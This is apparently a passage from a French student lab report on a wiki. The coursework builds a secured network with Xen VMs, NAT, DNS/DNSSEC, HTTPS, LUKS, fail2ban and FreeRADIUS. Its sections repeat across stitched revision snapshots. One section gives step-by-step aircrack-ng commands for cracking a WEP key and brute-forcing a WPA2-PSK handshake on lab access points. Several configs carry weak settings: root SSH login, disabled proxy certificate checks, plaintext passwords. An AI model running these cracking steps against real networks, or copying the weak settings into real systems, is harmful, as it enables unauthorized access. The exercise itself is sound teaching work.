maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^\S+ named\[\d+\]: client <HOST>#\S+ .* query .* denied
ignoreregex =
</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4 # VLAN 1 management
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3 # VLAN 1 management
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}

</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"

"etudiant1" Cleartext-Password := "Password123"

"prof" Cleartext-Password := "AdminSE4!"

</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123

Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

=== Policy‑Based Routing (PBR) ===
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

Atelier SysRes SE4 2025/2026 E15

2026-02-27T12:09:30Z

Msalhi : /* Configuration DHCP sur les routeurs */

<div class="titlepage">

'''Rapport de Projet SE4 IdO 
Sécurité Système/Réseau'''

'''Année Universitaire 2025-2026'''

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Étudiant: Mohamed SALHI'''

'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''

'''École Polytechnique Universitaire de Lille'''

2026-02-02

</div>

= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.

----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^\S+ named\[\d+\]: client <HOST>#\S+ .* query .* denied
ignoreregex =
</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4 # VLAN 1 management
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3 # VLAN 1 management
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}

</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"

"etudiant1" Cleartext-Password := "Password123"

"prof" Cleartext-Password := "AdminSE4!"

</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123

Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

=== Policy‑Based Routing (PBR) ===
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

Atelier SysRes SE4 2025/2026 E15

2026-02-27T12:08:47Z

Msalhi : /* Serveur FreeRADIUS sur Moon */

<div class="titlepage">

'''Rapport de Projet SE4 IdO 
Sécurité Système/Réseau'''

'''Année Universitaire 2025-2026'''

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Étudiant: Mohamed SALHI'''

'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''

'''École Polytechnique Universitaire de Lille'''

2026-02-02

</div>

= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
